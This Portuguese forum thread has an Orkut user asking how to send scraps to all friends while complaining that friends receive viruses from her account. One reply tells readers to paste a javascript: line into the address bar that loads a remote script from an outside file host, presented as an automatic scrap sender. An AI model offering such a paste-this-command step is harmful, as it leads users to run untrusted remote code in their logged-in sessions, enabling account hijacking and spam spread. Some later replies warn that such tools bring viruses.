Socorro como mando scrap para todos os amigos do orkut de uma vez só?

cara eles tao recebendo virus de mim mas eu to achando mto estranho pq nao entro no orkut ha dias e nao clico em nada suspeito... beijiiiiiiiiinhos

Update:

Malu meu perfil

http://www.orkut.com/Profile.aspx?uid=150491518498...

Comments

  • SCRAP PRA TODO MUNDO + 1 comando instruções ..

    scrap automatico mais rapido e mais facil

    Agora você pode enviar Scrap Automatico para toda sua lista de amigos em poucos minutos!

    AGORA MAIS PRÁTICO, VOCE SELECIONA TAMBEM O FINAL DA LISTA DE AMIGOS QUE ANTES NÃO ERA POSSÍVEL ENVIAR.

    Leia os passos abaixo de como usar.

    1 - Copie o Codigo abaixo e cole na BARRA DE ENDEREÇOS (aquele local onde se digita www). Apos colar, aperte a tecla ENTER (aguarde carregar a página).

    Codigo:

    javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://www.stashbox.org/64761/orkut_scraps_mensage...

    2 - Ira abrir a Janela do "programa". Selecione a opção 'todos os amigos'.

    Em 'mensagem' digite a mensagem que deseja enviar aos amigos.

    3 - Feito os passos anteriores, basta clicar no botão 'enviar scraps' que o programa ira enviar para todos AUTOMATICAMENTE!

  • Oi Moa é muito fácil

  • ai galera eu tenho orkut mais não curto muito não...mas se quiser tentar vai la...mas não aconselho ...tenho certeza q num é uma boa...beijos....

  • Oi

    Eu usava o Orkut Cute, era bom, mas de repente, ele não funcionou mais...Não sei se a dica da Mandy funciona, e os demais indicados são furada total...vais pegar outro virus pra poder avisar que está com virus...hahahaha

    Beijuxxxx

  • Procura a comunidade envie alegria...

    bjs

  • A Mandy explicou direitinho, Moa...

    Como posso te add no meu orkut?

    Bjo!!!

  • o Orkut Cute é bozin

    vai no www.baixaki.ig.com.br

    e baixe...

  • existem varios sites para fazer isso... e programas também...

    mas eskece! isso é furada! da ultima vz q fiz isso, peguei virus =/

  • descupe mais nao posso ajudala desta vez

    noinha

Sign In or Register to comment.